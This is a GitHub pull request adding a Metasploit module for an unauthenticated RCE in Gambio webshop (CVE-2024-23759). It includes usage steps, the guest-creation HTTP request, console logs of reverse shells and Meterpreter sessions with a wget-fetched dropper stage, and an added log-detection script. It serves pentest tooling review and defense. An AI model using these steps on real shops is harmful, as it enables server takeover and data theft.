
Gambio Online Webshop unauthenticated RCE [CVE-2024-23759] #19005

Merged
6 commits merged into from
Apr 19, 2024

Conversation

h00die-gr3y

@h00die-gr3y h00die-gr3y commented Mar 24, 2024

A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower allows remote attackers to run arbitrary commands via an unauthenticated HTTP POST request. Gambio version 3 is not vulnerable.
The identified vulnerability within Gambio pertains to an insecure deserialization flaw, which ultimately allows an attacker to execute remote code on affected systems.

The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands, potentially resulting in complete system compromise, data exfiltration, or unauthorized access to sensitive information.

This module has been tested with:

  • Gambio online webshop 4.7.2.0 on Ubuntu 22.04 running in VirtualBox 7.0.14 r161095 (Qt5.15.2).

Installation steps to install the Gambio Online Webshop

  • Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
  • Here are the installation instructions for VirtualBox on MacOS.
  • Download the Gambio Webshop software from here.
  • Unzip the package Gambio v4.7.2.0.zip and install the Gambio Online Webshop on your Linux Virtual Machine using the installation instructions provided in the ZIP file. Do not use a Windows VM (see Limitations section).
  • When installed, you should be able to access the Webshop either through HTTP port 80 or HTTPS port 443 depending on your configuration settings.

You are now ready to test the module.

Verification Steps

  • Start msfconsole
  • use exploit/multi/http/gambio_unauth_rce_cve_2024_23759
  • set rhosts <ip-target>
  • set rport <port>
  • set target <0=PHP, 1=Unix Command, 2=Linux Dropper>
  • exploit
  • you should get a reverse shell or Meterpreter session depending on the payload and target settings

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > info

       Name: Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability
     Module: exploit/multi/http/gambio_unauth_rce_cve_2024_23759
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-01-19

Provided by:
  h00die-gr3y <[email protected]>
  usd Herolab

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.201.25   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
                                        it/basics/using-metasploit.html
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The Gambia Webshop endpoint URL
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if
                                         left unset.


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address
                                       on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)

Payload information:

Description:
  A Remote Code Execution vulnerability in Gambio online webshop version 4.9.2.0 and lower
  allows remote attackers to run arbitrary commands via unauthenticated HTTP POST request.
  The identified vulnerability within Gambio pertains to an insecure deserialization flaw,
  which ultimately allows an attacker to execute remote code on affected systems.
  The insecure deserialization vulnerability in Gambio poses a significant risk to affected systems.
  As it allows remote code execution, adversaries could exploit this flaw to execute arbitrary commands,
  potentially resulting in complete system compromise, data exfiltration, or unauthorized access
  to sensitive information.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-23759
  https://attackerkb.com/topics/cxCsICfcDY/cve-2024-23759
  https://herolab.usd.de/en/security-advisories/usd-2023-0046/


View the full module info with the info -d command.

Scenarios

Target 0 - PHP native php/meterpreter/reverse_tcp session

msf6 > use exploits/multi/http/gambio_unauth_rce_cve_2024_23759
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 192.168.201.25
rhosts => 192.168.201.25
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80
rport => 80
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.25:80 can be exploited.
[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.25
[+] Deleted GmacadJjQQOXMux.php
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.25:60348) at 2024-03-24 09:15:50 +0000

meterpreter > sysinfo
Computer    : cuckoo
OS          : Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www
meterpreter > exit

Target 1 - Unix Command cmd/unix/reverse_bash session

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1
target => 1
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.25:80 can be exploited.
[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted UJoQmnhL.php
[*] Command shell session 2 opened (192.168.201.8:4444 -> 192.168.201.25:50728) at 2024-03-24 09:17:46 +0000

uname -a
Linux cuckoo 5.15.0-101-generic #111-Ubuntu SMP Tue Mar 5 20:16:58 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),29(audio)
exit

Target 2 - Linux Dropper linux/x64/meterpreter/reverse_tcp session

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2
target => 2
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.25:80 can be exploited.
[+] The target appears to be vulnerable. It looks like Gambio Webshop is running.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:8080/ODk0gcrj
[*] Client 192.168.201.25 (Wget/1.21.2) requested /ODk0gcrj
[*] Sending payload to 192.168.201.25 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 192.168.201.25
[+] Deleted gJlhCqCPLrR.php
[*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.25:46426) at 2024-03-24 09:18:23 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.25
OS           : Ubuntu 22.04 (Linux 5.15.0-101-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > pwd
/var/www
meterpreter > exit

Limitations

Gambio is also supported on Windows systems; however, the admin access seems to be broken on the vulnerable versions.
This causes the exploit not to run successfully.

@h00die-gr3y h00die-gr3y changed the title Artica Proxy unauthenticated RCE [CVE-2024-23759] Gambio Online Webshop unauthenticated RCE [CVE-2024-23759] Mar 24, 2024
@jheysel-r7 jheysel-r7 self-assigned this Apr 15, 2024
@jheysel-r7 jheysel-r7 added docs a2k19 Hackathon 2019 in Austin module and removed a2k19 Hackathon 2019 in Austin labels Apr 16, 2024

@jheysel-r7 jheysel-r7 left a comment


Thanks for the great module @h00die-gr3y. I was wondering if you might be able to elaborate on the Installation Steps part of the documentation, if you wouldn't mind?

Edit: I was able to install the application and get a test site up; however, I'm now running into an issue where the webshell upload is failing. Specifically, when the module attempts to create a guest user to get a valid session cookie, I'm receiving a 200 instead of a 302. Not sure if this is an issue with the module or my installation; installation tips would be appreciated!

@h00die-gr3y

h00die-gr3y commented Apr 17, 2024

@jheysel-r7 that is awkward. Which version did you install, v4.7.2.0?
You should get a 302 response. I have pasted my burp request and response.
Do you get the session cookie in your response?

By the way, there is something strange going on with the country setting. In my case, only country=8 works. Other values throw a 200 or, in the case of country=10, a 500 error. This could trigger this behavior.

UPDATE 17 April 19:35 CET: I found the reason. In the admin panel, you can activate countries for tax calculations. Only country settings with activated countries will work. In my case only country 8 (Antarctica) is activated. In your case this could be another country (check http://your_ip/admin/countries.php).

Anyhow, based on this finding, I need to update the exploit. On the main page, I can grab the available country setting(s) that can be used for the creation of the guest user.

Good catch, my friend!!!

Request

POST /shop.php?do=CreateGuest/Proceed HTTP/1.1
Host: 192.168.201.25
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 314
Connection: close

firstname=albert&lastname=hall&email_address=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&email_address_confirm=albert.hall%40mg4vigajd.kfw.wcb.z3tyvon7.sqov5ebkt.gov&b2b_status=0&company=&vat=&street_address=nimgtewxwrvn&postcode=67323&city=qrrynwcgevg&country=8&telephone=9612904323&fax=&action=process

Response

HTTP/1.1 302 Found
Date: Wed, 17 Apr 2024 16:49:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Set-Cookie: GXsid_09529a70d105f1a0=g0pc2krkvu4dasc6gblfj16s2n; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: GXsid_09529a70d105f1a0=kpfqnun2o8731flqnqc1687kqk; path=/; domain=192.168.201.25; HttpOnly; SameSite=Lax
Location: http://192.168.201.25/shopping_cart.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
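
The guest-creation POST above and the randomly named PHP file that the module reports deleting in the Scenarios output both leave traces in the web server's access log (the module itself declares the ioc-in-logs and artifacts-on-disk side effects). The following is an added detection example, not code from the PR or the Metasploit module: it scans constructed Apache access-log lines for a client that completes guest creation (302) and then requests an unfamiliar root-level .php within a short window. The allowlist of known scripts, the random-name heuristic and the five-minute window are assumptions to be tuned per installation.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-format lines (not taken from a real server).
# 198.51.100.7 is an ordinary shopper; 192.0.2.50 creates a guest session and
# then fetches a root-level PHP file with a random-looking name, which is the
# artifact the module output shows it deleting afterwards.
SAMPLE_LOG = """\
198.51.100.7 - - [17/Apr/2024:16:49:10 +0000] "GET /shop.php?do=CreateGuest HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Apr/2024:16:49:20 +0000] "POST /shop.php?do=CreateGuest/Proceed HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [17/Apr/2024:16:49:25 +0000] "GET /shopping_cart.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.50 - - [17/Apr/2024:16:49:57 +0000] "POST /shop.php?do=CreateGuest/Proceed HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.50 - - [17/Apr/2024:16:49:59 +0000] "GET /GmacadJjQQOXMux.php HTTP/1.1" 200 39927 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The request the module uses to obtain a guest session (from the PR thread).
GUEST_PROCEED = "/shop.php?do=CreateGuest/Proceed"
# Assumption: legitimate root-level scripts of this shop. Extend this with the
# scripts actually present in the installed Gambio web root.
KNOWN_ROOT_SCRIPTS = {"/shop.php", "/shopping_cart.php"}
# Assumption: a dropped webshell has a short alphanumeric name directly in the
# web root, like the names the module prints ("Deleted GmacadJjQQOXMux.php").
SUSPECT_PHP = re.compile(r"^/[A-Za-z0-9]{6,20}\.php$")
WINDOW = timedelta(minutes=5)  # assumed correlation window


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_suspicious_sequences(log_text, window=WINDOW):
    """Return (ip, guest_creation_ts, php_path) for every client that got a
    302 from the guest-creation POST and then requested an unfamiliar
    root-level .php file within `window`."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]

    # First pass: when did each client successfully create a guest session?
    guest_ok = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"] == GUEST_PROCEED and e["status"] == 302:
            guest_ok[e["ip"]].append(e["ts"])

    # Second pass: unfamiliar root-level .php requests shortly afterwards.
    hits = []
    for e in events:
        base = e["path"].split("?", 1)[0]
        if base in KNOWN_ROOT_SCRIPTS or not SUSPECT_PHP.match(base):
            continue
        for g_ts in guest_ok.get(e["ip"], ()):
            if g_ts <= e["ts"] <= g_ts + window:
                hits.append((e["ip"], g_ts.isoformat(), base))
                break
    return hits


if __name__ == "__main__":
    for ip, when, path in find_suspicious_sequences(SAMPLE_LOG):
        print(f"{ip}: guest session at {when}, then requested {path}")
```

A single unfamiliar .php request is a weak signal on its own; correlating it with the preceding guest-creation redirect from the same client is what makes the alert specific to this module's behaviour.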

@jheysel-r7

@h00die-gr3y, thanks so much for digging into this and figuring out what was going on! My tax zone was set to only Germany. I tried switching to Antarctica and was still seeing the same issue, but when I selected Activate All on the countries.php page, I then got a session.

msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > rexploit
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.16.199.131
[+] Deleted stNqVLuUD.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:35906) at 2024-04-17 11:45:50 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct  6 10:23:26 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

@h00die-gr3y

h00die-gr3y commented Apr 18, 2024

@jheysel-r7, added the logic to grab the tax country options configured at the application before creating the guest user. This should fix the issue. See 331c961.


@jheysel-r7 jheysel-r7 left a comment


Thanks for fixing that country tax code issue @h00die-gr3y! Everything worked perfectly after the fix. I re-tested the module with the couple of minor fixes I added as part of this review. I'll land it once CI tests pass.

Testing all 3 targets on Ubuntu 22.04 running Gambio 4.7.2.0

msf6 > use gambio_unauth_rce

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank       Check  Description
   -  ----                                                 ---------------  ----       -----  -----------
   0  exploit/multi/http/gambio_unauth_rce_cve_2024_23759  2024-01-19       excellent  Yes    Gambio Online Webshop unauthenticated PHP Deserialization Vulnerability
   1  \_ target: PHP                                       .                .          .      .
   2  \_ target: Unix Command                              .                .          .      .
   3  \_ target: Linux Dropper                             .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/http/gambio_unauth_rce_cve_2024_23759
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'

[*] Using exploit/multi/http/gambio_unauth_rce_cve_2024_23759
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rhosts 172.16.199.131
rhosts => 172.16.199.131
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set rport 80
rport => 80
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set targeturi /GX4/Shopsystem/Dateien/
targeturi => /GX4/Shopsystem/Dateien/
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 172.16.199.131
[+] Deleted BFuxmTqXsRWL.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:39636) at 2024-04-19 10:15:15 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64
Meterpreter : php/linux
meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 1
target => 1
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted qeALOikWyPPyY.php
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.131:53736) at 2024-04-19 10:17:07 -0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux msfuser-virtual-machine 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 172.16.199.131 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set target 2
target => 2
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gambio_unauth_rce_cve_2024_23759) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 172.16.199.131:80 can be exploited.
[!] The service is running, but could not be validated. It looks like Gambio Webshop is running.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://172.16.199.1:8080/22nwaokgZbpn
[*] Client 172.16.199.131 (Wget/1.21.2) requested /22nwaokgZbpn
[*] Sending payload to 172.16.199.131 (Wget/1.21.2)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[+] Deleted JgOOgKvzwakx.php
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.131:43288) at 2024-04-19 10:17:46 -0700
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.16.199.131
OS           : Ubuntu 22.04 (Linux 6.5.0-27-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@h00die-gr3y

Cool. Thanks!

@jheysel-r7 jheysel-r7 closed this pull request by merging all changes into rapid7:master in b8675f0 Apr 19, 2024
@jheysel-r7

jheysel-r7 commented Apr 19, 2024

Release Notes

This adds a module for a Remote Code Execution vulnerability in Gambio Online Webshop version 4.9.2.0 and lower that allows remote attackers to run arbitrary commands via an unauthenticated HTTP POST request.

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 19, 2024
@h00die-gr3y h00die-gr3y deleted the gambio-unauth-rce branch April 20, 2024 08:03